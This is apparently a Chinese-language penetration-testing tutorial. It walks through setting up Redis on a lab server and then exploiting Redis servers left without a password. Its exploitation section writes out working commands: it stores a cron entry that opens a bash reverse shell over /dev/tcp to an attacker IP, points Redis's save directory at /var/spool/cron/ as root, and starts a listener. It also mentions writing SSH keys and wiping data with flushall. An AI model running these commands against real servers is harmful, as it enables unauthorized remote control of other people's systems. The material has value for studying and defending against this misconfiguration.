Redis未授权访问漏洞利用

redis环境搭建

1.首先将我们所用到的文件上传到服务器并解压

在这里插入图片描述

2.进入redis文件夹 使用 make 命令编译 如果报错gcc未找到就使用yum命令安装一下gcc: yum -y install gcc

Redis未授权访问漏洞利用_第1张图片

3.进入redis下的src文件夹 有redis.server证明安装成功 使./redis.service

启动redis
Redis未授权访问漏洞利用_第2张图片

4.链接redis话再打开一个终端进入redis下src目录使用./redis.cli就可以进行链接

Redis未授权访问漏洞利用_第3张图片

5.为了方便使用可以将redis-cli复制到/usr/local/bin目录下,这样就可以在任意位置使用redis-cli来连接

Redis未授权访问漏洞利用_第4张图片

redis未授权访问漏洞

Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据可导致敏感信息泄露,也可以恶意执行flushall来清空所以数据。攻击者可通过eval执行LUA代码,或通过数据备份功能往磁盘写入后门文件如果redis以root身份运行可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。

1.当服务器安装完redis后没有设置密码这时候就存在redis未授权漏洞
我们可以使用另一台有reids服务器进行连接
示例:我们centos服务器是搭建了redis并且没设置密码,然后我们使用安装了redis服务的kali服务器进行连接

redis-cli -h 192.168.1.19 -p 6379

Redis未授权访问漏洞利用_第5张图片

redis未授权漏洞利用

写入计划任务反弹shell

set x "\n* * * * * /bin/bash -i > /dev/tcp/192.168.1.9/6666 0<&1 2>&1\n"

以上命令就是写入计划任务反弹shell,ip设置为攻击机的ip 端口自定,每分钟执行一次。
config set dir /var/spool/cron/ 设置路径

config set dbfilename root  设置以root身份执行
save   保存

Redis未授权访问漏洞利用_第6张图片以上完成后在攻击机开启一个监听 拿到权限可以控制服务器。

nv -lvp 6666

Redis未授权访问漏洞利用_第7张图片

你可能感兴趣的:(渗透,redis,数据库,网络安全)